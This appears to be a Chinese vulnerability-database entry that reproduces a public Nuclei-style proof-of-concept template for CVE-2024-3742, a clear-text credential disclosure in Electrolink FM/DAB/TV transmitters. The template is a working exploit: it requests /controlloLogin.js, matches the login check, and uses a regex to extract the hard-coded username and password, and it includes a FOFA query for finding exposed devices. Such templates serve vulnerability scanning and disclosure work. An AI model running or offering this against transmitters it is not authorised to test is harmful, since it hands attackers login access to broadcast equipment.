漏洞描述
Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.
CVE-2024-3742: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
PoC代码[已公开]
id: CVE-2024-3742
info:
name: Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
author: Farish
severity: high
description: |
Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php
- https://nvd.nist.gov/vuln/detail/CVE-2024-3742
- https://packetstormsecurity.com/files/174875/
- https://www.cisa.gov/news-events/ics-advisories/icsa-24-107-02
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-3742
cwe-id: CWE-312
epss-score: 0.10226
epss-percentile: 0.92865
metadata:
verified: true
max-request: 1
fofa-query: "Electrolink s.r.l."
tags: packetstorm,cve,cve2024,electrolink,info-leak
http:
- raw:
- |
GET /controlloLogin.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "application/x-javascript")'
- 'contains(body, "user==") && contains(body, "password==")'
- 'status_code == 200'
condition: and
extractors:
- type: regex
part: body
regex:
- user\s*==\s*'([^']*)'\s*&&\s*password\s*==\s*'([^']*)'
# digest: 4a0a00473045022100f0ff55dd36a6787b590e30952fa82bf0f97370f6289b7538b06498408ffb3f3202205caa655e21ede8c2cfa408389898f5b8ff9e1ca7217766194ac21bca79466269:922c64590222798bb761d5b6d8e72950